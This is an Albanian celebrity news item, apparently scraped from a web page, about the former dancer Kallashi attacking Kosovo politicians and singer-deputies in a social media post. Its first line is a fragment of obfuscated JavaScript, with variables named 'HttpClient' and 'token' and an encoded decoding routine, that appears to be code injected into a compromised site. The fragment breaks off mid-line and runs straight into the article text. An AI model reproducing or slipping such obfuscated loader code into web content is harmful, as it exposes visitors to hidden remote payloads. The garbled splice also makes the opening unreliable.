;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kallashi godet politikën dhe këta këngëtarë (FOTO)

By

Për gati tre vite rresht ajo ishte çdo ditë në portale.

Secili veprim, secila foto, secili postim i Kallashit bënin bujë në publik duke e transformuar valltaren në një ‘hambar’ lajmesh për median online.

Megjithatë, tash e një kohë, Kallashi sikur është tretur pak.

Ajo ka hequr dorë nga vallëzimi në klube teksa edhe rrjetet sociale i ka të limituara.

Përkundër këtij fakti, edhe pse poston rrallë, Kallashi kujdeset të marrë vëmendjenn. Ajo sot është shfaqur kritike ndaj politikës në prag të zgjedhjeve, duke i dhënë vetes të drejtën të lëshohet në analiza për nivelin zhgënjyes të politikanëve në vend.

‘Po mendoj nganjëherë mos është duke i paguar Serbia këta njerëz për me hi në parlament të Kosovës për me i tregu botës se këta nuk kanë njerëz të ditur për me mbajt shtet’ – ka deklaruar Kallashi në postimin e saj në rrjete sociale.

Donjeta, pa përmendur emra ka thumbuar edhe këngëtarë të cilët janë deputetë duke deklaruar se nuk e kanë vendin aty.

‘Shumica janë bodyguard, këngëtarë tallava, qobana pa shkollë, pak prej tyre e meritojnë përfaqësimin në parlamentin e Kosovës’ – ka përfunduar valltarja. /Prive.al

Artikuj të ngjashëm